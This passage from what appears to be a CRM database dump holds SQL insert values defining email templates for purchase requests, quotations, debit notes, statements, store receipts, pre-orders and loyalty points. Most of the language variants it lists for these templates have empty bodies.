(2385, 'notifications', 'non-billed-tasks-reminder', 'polish', 'Non-billed tasks reminder (sent to selected staff members) [polish]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2386, 'invoice', 'invoices-batch-payments', 'polish', 'Invoices Payments Recorded in Batch (Sent to Customer) [polish]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2387, 'notifications', 'non-billed-tasks-reminder', 'ukrainian', 'Non-billed tasks reminder (sent to selected staff members) [ukrainian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2388, 'invoice', 'invoices-batch-payments', 'ukrainian', 'Invoices Payments Recorded in Batch (Sent to Customer) [ukrainian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2389, 'notifications', 'non-billed-tasks-reminder', 'persian', 'Non-billed tasks reminder (sent to selected staff members) [persian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2390, 'invoice', 'invoices-batch-payments', 'persian', 'Invoices Payments Recorded in Batch (Sent to Customer) [persian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2391, 'notifications', 'non-billed-tasks-reminder', 'japanese', 'Non-billed tasks reminder (sent to selected staff members) [japanese]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2392, 'invoice', 'invoices-batch-payments', 'japanese', 'Invoices Payments Recorded in Batch (Sent to Customer) [japanese]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2393, 'notifications', 'non-billed-tasks-reminder', 'spanish', 'Non-billed tasks reminder (sent to selected staff members) [spanish]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2394, 'invoice', 'invoices-batch-payments', 'spanish', 'Invoices Payments Recorded in Batch (Sent to Customer) [spanish]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2395, 'notifications', 'non-billed-tasks-reminder', 'italian', 'Non-billed tasks reminder (sent to selected staff members) [italian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2396, 'invoice', 'invoices-batch-payments', 'italian', 'Invoices Payments Recorded in Batch (Sent to Customer) [italian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2397, 'notifications', 'non-billed-tasks-reminder', 'slovak', 'Non-billed tasks reminder (sent to selected staff members) [slovak]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2398, 'invoice', 'invoices-batch-payments', 'slovak', 'Invoices Payments Recorded in Batch (Sent to Customer) [slovak]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2399, 'notifications', 'non-billed-tasks-reminder', 'portuguese_br', 'Non-billed tasks reminder (sent to selected staff members) [portuguese_br]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2400, 'invoice', 'invoices-batch-payments', 'portuguese_br', 'Invoices Payments Recorded in Batch (Sent to Customer) [portuguese_br]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2401, 'purchase_order', 'purchase-request-to-contact', 'english', 'Purchase Request (Sent to contact)', 'Purchase Request', '<span style=\\\"font-size: 12pt;\\\"> Hello !. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> We would like to share with you a link of Purchase Request information with the number {pr_number} </span><br /><br /><span style=\\\"font-size: 12pt;\\\"><br />Please click on the link to view information: {public_link}<br/ >{additional_content}\r\n  </span><br /><br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2402, 'purchase_order', 'purchase-quotation-to-contact', 'english', 'Purchase Quotation (Sent to contact)', 'Purchase Quotation', '<span style=\\\"font-size: 12pt;\\\"> Hello !. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> We would like to share with you a link of Purchase Quotation information with the number {pq_number} </span><br /><br /><span style=\\\"font-size: 12pt;\\\"><br />Please click on the link to view information: {quotation_link}<br/ >{additional_content}\r\n  </span><br /><br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2403, 'purchase_order', 'debit-note-to-contact', 'english', 'Debit Note (Sent to contact)', 'Debit Note', '<span style=\\\"font-size: 12pt;\\\"> Hello !. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> We would like to share with you a link of Debit Note information with the number {dn_number} </span><br /><br /><span style=\\\"font-size: 12pt;\\\"><br />{additional_content}\r\n		  </span><br /><br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2404, 'purchase_order', 'purchase-statement-to-contact', 'english', 'Purchase Statement (Sent to contact)', 'Purchase Statement', '<span style=\\\"font-size: 12pt;\\\"> Dear {contact_firstname} {contact_lastname} !. </span><br /><br /><span style=\\\"font-size: 12pt;\\\">Its been a great experience working with you. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"><br />Attached with this email is a list of all transactions for the period between {statement_from} to {statement_to}<br/ ><br/ >For your information your account balance due is total: {statement_balance_due}<br /><br/ > Please contact us if you need more information.<br/ > <br />{additional_content}\r\n  </span><br /><br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2405, 'purchase_order', 'purchase-request-to-contact', 'swedish', 'Purchase Request (Sent to contact) [swedish]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2406, 'purchase_order', 'purchase-quotation-to-contact', 'swedish', 'Purchase Quotation (Sent to contact) [swedish]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2407, 'purchase_order', 'debit-note-to-contact', 'swedish', 'Debit Note (Sent to contact) [swedish]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2408, 'purchase_order', 'purchase-statement-to-contact', 'swedish', 'Purchase Statement (Sent to contact) [swedish]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2409, 'purchase_order', 'purchase-request-to-contact', 'portuguese', 'Purchase Request (Sent to contact) [portuguese]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2410, 'purchase_order', 'purchase-quotation-to-contact', 'portuguese', 'Purchase Quotation (Sent to contact) [portuguese]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2411, 'purchase_order', 'debit-note-to-contact', 'portuguese', 'Debit Note (Sent to contact) [portuguese]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2412, 'purchase_order', 'purchase-statement-to-contact', 'portuguese', 'Purchase Statement (Sent to contact) [portuguese]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2413, 'purchase_order', 'purchase-request-to-contact', 'turkish', 'Purchase Request (Sent to contact) [turkish]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2414, 'purchase_order', 'purchase-quotation-to-contact', 'turkish', 'Purchase Quotation (Sent to contact) [turkish]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2415, 'purchase_order', 'debit-note-to-contact', 'turkish', 'Debit Note (Sent to contact) [turkish]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2416, 'purchase_order', 'purchase-statement-to-contact', 'turkish', 'Purchase Statement (Sent to contact) [turkish]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2417, 'purchase_order', 'purchase-request-to-contact', 'bulgarian', 'Purchase Request (Sent to contact) [bulgarian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2418, 'purchase_order', 'purchase-quotation-to-contact', 'bulgarian', 'Purchase Quotation (Sent to contact) [bulgarian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2419, 'purchase_order', 'debit-note-to-contact', 'bulgarian', 'Debit Note (Sent to contact) [bulgarian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2420, 'purchase_order', 'purchase-statement-to-contact', 'bulgarian', 'Purchase Statement (Sent to contact) [bulgarian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2421, 'purchase_order', 'purchase-request-to-contact', 'dutch', 'Purchase Request (Sent to contact) [dutch]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2422, 'purchase_order', 'purchase-quotation-to-contact', 'dutch', 'Purchase Quotation (Sent to contact) [dutch]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2423, 'purchase_order', 'debit-note-to-contact', 'dutch', 'Debit Note (Sent to contact) [dutch]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2424, 'purchase_order', 'purchase-statement-to-contact', 'dutch', 'Purchase Statement (Sent to contact) [dutch]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2425, 'purchase_order', 'purchase-request-to-contact', 'russian', 'Purchase Request (Sent to contact) [russian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2426, 'purchase_order', 'purchase-quotation-to-contact', 'russian', 'Purchase Quotation (Sent to contact) [russian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2427, 'purchase_order', 'debit-note-to-contact', 'russian', 'Debit Note (Sent to contact) [russian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2428, 'purchase_order', 'purchase-statement-to-contact', 'russian', 'Purchase Statement (Sent to contact) [russian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2429, 'purchase_order', 'purchase-request-to-contact', 'greek', 'Purchase Request (Sent to contact) [greek]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2430, 'purchase_order', 'purchase-quotation-to-contact', 'greek', 'Purchase Quotation (Sent to contact) [greek]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2431, 'purchase_order', 'debit-note-to-contact', 'greek', 'Debit Note (Sent to contact) [greek]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2432, 'purchase_order', 'purchase-statement-to-contact', 'greek', 'Purchase Statement (Sent to contact) [greek]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2433, 'purchase_order', 'purchase-request-to-contact', 'catalan', 'Purchase Request (Sent to contact) [catalan]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2434, 'purchase_order', 'purchase-quotation-to-contact', 'catalan', 'Purchase Quotation (Sent to contact) [catalan]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2435, 'purchase_order', 'debit-note-to-contact', 'catalan', 'Debit Note (Sent to contact) [catalan]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2436, 'purchase_order', 'purchase-statement-to-contact', 'catalan', 'Purchase Statement (Sent to contact) [catalan]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2437, 'purchase_order', 'purchase-request-to-contact', 'german', 'Purchase Request (Sent to contact) [german]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2438, 'purchase_order', 'purchase-quotation-to-contact', 'german', 'Purchase Quotation (Sent to contact) [german]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2439, 'purchase_order', 'debit-note-to-contact', 'german', 'Debit Note (Sent to contact) [german]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2440, 'purchase_order', 'purchase-statement-to-contact', 'german', 'Purchase Statement (Sent to contact) [german]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2441, 'purchase_order', 'purchase-request-to-contact', 'chinese', 'Purchase Request (Sent to contact) [chinese]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2442, 'purchase_order', 'purchase-quotation-to-contact', 'chinese', 'Purchase Quotation (Sent to contact) [chinese]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2443, 'purchase_order', 'debit-note-to-contact', 'chinese', 'Debit Note (Sent to contact) [chinese]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2444, 'purchase_order', 'purchase-statement-to-contact', 'chinese', 'Purchase Statement (Sent to contact) [chinese]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2445, 'purchase_order', 'purchase-request-to-contact', 'vietnamese', 'Purchase Request (Sent to contact) [vietnamese]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2446, 'purchase_order', 'purchase-quotation-to-contact', 'vietnamese', 'Purchase Quotation (Sent to contact) [vietnamese]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2447, 'purchase_order', 'debit-note-to-contact', 'vietnamese', 'Debit Note (Sent to contact) [vietnamese]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2448, 'purchase_order', 'purchase-statement-to-contact', 'vietnamese', 'Purchase Statement (Sent to contact) [vietnamese]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2449, 'purchase_order', 'purchase-request-to-contact', 'indonesia', 'Purchase Request (Sent to contact) [indonesia]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2450, 'purchase_order', 'purchase-quotation-to-contact', 'indonesia', 'Purchase Quotation (Sent to contact) [indonesia]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2451, 'purchase_order', 'debit-note-to-contact', 'indonesia', 'Debit Note (Sent to contact) [indonesia]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2452, 'purchase_order', 'purchase-statement-to-contact', 'indonesia', 'Purchase Statement (Sent to contact) [indonesia]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2453, 'purchase_order', 'purchase-request-to-contact', 'french', 'Purchase Request (Sent to contact) [french]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2454, 'purchase_order', 'purchase-quotation-to-contact', 'french', 'Purchase Quotation (Sent to contact) [french]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2455, 'purchase_order', 'debit-note-to-contact', 'french', 'Debit Note (Sent to contact) [french]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2456, 'purchase_order', 'purchase-statement-to-contact', 'french', 'Purchase Statement (Sent to contact) [french]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2457, 'purchase_order', 'purchase-request-to-contact', 'czech', 'Purchase Request (Sent to contact) [czech]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2458, 'purchase_order', 'purchase-quotation-to-contact', 'czech', 'Purchase Quotation (Sent to contact) [czech]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2459, 'purchase_order', 'debit-note-to-contact', 'czech', 'Debit Note (Sent to contact) [czech]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2460, 'purchase_order', 'purchase-statement-to-contact', 'czech', 'Purchase Statement (Sent to contact) [czech]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2461, 'purchase_order', 'purchase-request-to-contact', 'romanian', 'Purchase Request (Sent to contact) [romanian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2462, 'purchase_order', 'purchase-quotation-to-contact', 'romanian', 'Purchase Quotation (Sent to contact) [romanian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2463, 'purchase_order', 'debit-note-to-contact', 'romanian', 'Debit Note (Sent to contact) [romanian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2464, 'purchase_order', 'purchase-statement-to-contact', 'romanian', 'Purchase Statement (Sent to contact) [romanian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2465, 'purchase_order', 'purchase-request-to-contact', 'polish', 'Purchase Request (Sent to contact) [polish]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2466, 'purchase_order', 'purchase-quotation-to-contact', 'polish', 'Purchase Quotation (Sent to contact) [polish]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2467, 'purchase_order', 'debit-note-to-contact', 'polish', 'Debit Note (Sent to contact) [polish]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2468, 'purchase_order', 'purchase-statement-to-contact', 'polish', 'Purchase Statement (Sent to contact) [polish]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2469, 'purchase_order', 'purchase-request-to-contact', 'ukrainian', 'Purchase Request (Sent to contact) [ukrainian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2470, 'purchase_order', 'purchase-quotation-to-contact', 'ukrainian', 'Purchase Quotation (Sent to contact) [ukrainian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2471, 'purchase_order', 'debit-note-to-contact', 'ukrainian', 'Debit Note (Sent to contact) [ukrainian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2472, 'purchase_order', 'purchase-statement-to-contact', 'ukrainian', 'Purchase Statement (Sent to contact) [ukrainian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2473, 'purchase_order', 'purchase-request-to-contact', 'persian', 'Purchase Request (Sent to contact) [persian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2474, 'purchase_order', 'purchase-quotation-to-contact', 'persian', 'Purchase Quotation (Sent to contact) [persian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2475, 'purchase_order', 'debit-note-to-contact', 'persian', 'Debit Note (Sent to contact) [persian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2476, 'purchase_order', 'purchase-statement-to-contact', 'persian', 'Purchase Statement (Sent to contact) [persian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2477, 'purchase_order', 'purchase-request-to-contact', 'japanese', 'Purchase Request (Sent to contact) [japanese]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2478, 'purchase_order', 'purchase-quotation-to-contact', 'japanese', 'Purchase Quotation (Sent to contact) [japanese]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2479, 'purchase_order', 'debit-note-to-contact', 'japanese', 'Debit Note (Sent to contact) [japanese]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2480, 'purchase_order', 'purchase-statement-to-contact', 'japanese', 'Purchase Statement (Sent to contact) [japanese]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2481, 'purchase_order', 'purchase-request-to-contact', 'spanish', 'Purchase Request (Sent to contact) [spanish]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2482, 'purchase_order', 'purchase-quotation-to-contact', 'spanish', 'Purchase Quotation (Sent to contact) [spanish]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2483, 'purchase_order', 'debit-note-to-contact', 'spanish', 'Debit Note (Sent to contact) [spanish]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2484, 'purchase_order', 'purchase-statement-to-contact', 'spanish', 'Purchase Statement (Sent to contact) [spanish]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2485, 'purchase_order', 'purchase-request-to-contact', 'italian', 'Purchase Request (Sent to contact) [italian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2486, 'purchase_order', 'purchase-quotation-to-contact', 'italian', 'Purchase Quotation (Sent to contact) [italian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2487, 'purchase_order', 'debit-note-to-contact', 'italian', 'Debit Note (Sent to contact) [italian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2488, 'purchase_order', 'purchase-statement-to-contact', 'italian', 'Purchase Statement (Sent to contact) [italian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2489, 'purchase_order', 'purchase-request-to-contact', 'slovak', 'Purchase Request (Sent to contact) [slovak]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2490, 'purchase_order', 'purchase-quotation-to-contact', 'slovak', 'Purchase Quotation (Sent to contact) [slovak]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2491, 'purchase_order', 'debit-note-to-contact', 'slovak', 'Debit Note (Sent to contact) [slovak]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2492, 'purchase_order', 'purchase-statement-to-contact', 'slovak', 'Purchase Statement (Sent to contact) [slovak]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2493, 'purchase_order', 'purchase-request-to-contact', 'portuguese_br', 'Purchase Request (Sent to contact) [portuguese_br]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2494, 'purchase_order', 'purchase-quotation-to-contact', 'portuguese_br', 'Purchase Quotation (Sent to contact) [portuguese_br]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2495, 'purchase_order', 'debit-note-to-contact', 'portuguese_br', 'Debit Note (Sent to contact) [portuguese_br]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2496, 'purchase_order', 'purchase-statement-to-contact', 'portuguese_br', 'Purchase Statement (Sent to contact) [portuguese_br]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2497, 'omni_sales', 'purchase-receipt', 'english', 'Purchase receipt (Sent to customer)', 'Purchase receipt', 'Hi {staff_name}! <br /><br />Thank you for shopping in our store.<br />\r\n    We send a receipt of your purchase below.<br />{<span 12pt=\"\">notification_content</span>}. <br /><br />Kind Regards.<br/>Very pleased to serve you!', '{companyname} | CRM', NULL, 0, 1, 0),
(2498, 'omni_sales', 'pre-orders-notify', 'english', 'Pre-orders notify (Sent to seller)', 'Pre-orders notify', 'Hi {seller_name}! <br /><br />You have a new order from {buyer_name}, the order is created at {create_at}. View order details: {link}.<br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2499, 'omni_sales', 'pre-orders-handover', 'english', 'Pre-orders handover', 'Pre-orders handover', 'Hi {to_name}! <br /><br />{from_name} has handed over an order to you. View order details: {link}.<br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2500, 'loyalty', 'loyalty-new-account-bonus-point', 'english', 'Loyalty new account bonus point (Sent to contact)', 'New account bonus point', '<span style=\\\"font-size: 12pt;\\\"> Hello {contact_name}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> You get {points_received} points from our loyalty program for new account. Hope you have the best shopping experience on our system!</span><br /><br />', '{companyname} | CRM', NULL, 0, 0, 0),
(2501, 'loyalty', 'loyalty-birthday-bonus-point', 'english', 'Loyalty birthday bonus point (Sent to contact)', 'Birthday bonus point', '<span style=\\\"font-size: 12pt;\\\"> Hello {contact_name}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> Happy birthday to you! You get {points_received} points from our loyalty program for your bithday. Hope you have the best shopping experience on our system!</span><br /><br />', '{companyname} | CRM', NULL, 0, 0, 0),
(2502, 'omni_sales', 'purchase-receipt', 'swedish', 'Purchase receipt (Sent to customer) [swedish]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2503, 'omni_sales', 'pre-orders-notify', 'swedish', 'Pre-orders notify (Sent to seller) [swedish]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2504, 'omni_sales', 'pre-orders-handover', 'swedish', 'Pre-orders handover [swedish]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2505, 'loyalty', 'loyalty-new-account-bonus-point', 'swedish', 'Loyalty new account bonus point (Sent to contact) [swedish]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2506, 'loyalty', 'loyalty-birthday-bonus-point', 'swedish', 'Loyalty birthday bonus point (Sent to contact) [swedish]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2507, 'omni_sales', 'purchase-receipt', 'portuguese', 'Purchase receipt (Sent to customer) [portuguese]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2508, 'omni_sales', 'pre-orders-notify', 'portuguese', 'Pre-orders notify (Sent to seller) [portuguese]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2509, 'omni_sales', 'pre-orders-handover', 'portuguese', 'Pre-orders handover [portuguese]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2510, 'loyalty', 'loyalty-new-account-bonus-point', 'portuguese', 'Loyalty new account bonus point (Sent to contact) [portuguese]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2511, 'loyalty', 'loyalty-birthday-bonus-point', 'portuguese', 'Loyalty birthday bonus point (Sent to contact) [portuguese]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2512, 'omni_sales', 'purchase-receipt', 'turkish', 'Purchase receipt (Sent to customer) [turkish]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2513, 'omni_sales', 'pre-orders-notify', 'turkish', 'Pre-orders notify (Sent to seller) [turkish]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2514, 'omni_sales', 'pre-orders-handover', 'turkish', 'Pre-orders handover [turkish]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2515, 'loyalty', 'loyalty-new-account-bonus-point', 'turkish', 'Loyalty new account bonus point (Sent to contact) [turkish]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2516, 'loyalty', 'loyalty-birthday-bonus-point', 'turkish', 'Loyalty birthday bonus point (Sent to contact) [turkish]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2517, 'omni_sales', 'purchase-receipt', 'bulgarian', 'Purchase receipt (Sent to customer) [bulgarian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2518, 'omni_sales', 'pre-orders-notify', 'bulgarian', 'Pre-orders notify (Sent to seller) [bulgarian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2519, 'omni_sales', 'pre-orders-handover', 'bulgarian', 'Pre-orders handover [bulgarian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2520, 'loyalty', 'loyalty-new-account-bonus-point', 'bulgarian', 'Loyalty new account bonus point (Sent to contact) [bulgarian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2521, 'loyalty', 'loyalty-birthday-bonus-point', 'bulgarian', 'Loyalty birthday bonus point (Sent to contact) [bulgarian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2522, 'omni_sales', 'purchase-receipt', 'dutch', 'Purchase receipt (Sent to customer) [dutch]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2523, 'omni_sales', 'pre-orders-notify', 'dutch', 'Pre-orders notify (Sent to seller) [dutch]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2524, 'omni_sales', 'pre-orders-handover', 'dutch', 'Pre-orders handover [dutch]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2525, 'loyalty', 'loyalty-new-account-bonus-point', 'dutch', 'Loyalty new account bonus point (Sent to contact) [dutch]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2526, 'loyalty', 'loyalty-birthday-bonus-point', 'dutch', 'Loyalty birthday bonus point (Sent to contact) [dutch]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2527, 'omni_sales', 'purchase-receipt', 'russian', 'Purchase receipt (Sent to customer) [russian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2528, 'omni_sales', 'pre-orders-notify', 'russian', 'Pre-orders notify (Sent to seller) [russian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2529, 'omni_sales', 'pre-orders-handover', 'russian', 'Pre-orders handover [russian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2530, 'loyalty', 'loyalty-new-account-bonus-point', 'russian', 'Loyalty new account bonus point (Sent to contact) [russian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2531, 'loyalty', 'loyalty-birthday-bonus-point', 'russian', 'Loyalty birthday bonus point (Sent to contact) [russian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2532, 'omni_sales', 'purchase-receipt', 'greek', 'Purchase receipt (Sent to customer) [greek]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2533, 'omni_sales', 'pre-orders-notify', 'greek', 'Pre-orders notify (Sent to seller) [greek]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2534, 'omni_sales', 'pre-orders-handover', 'greek', 'Pre-orders handover [greek]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2535, 'loyalty', 'loyalty-new-account-bonus-point', 'greek', 'Loyalty new account bonus point (Sent to contact) [greek]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
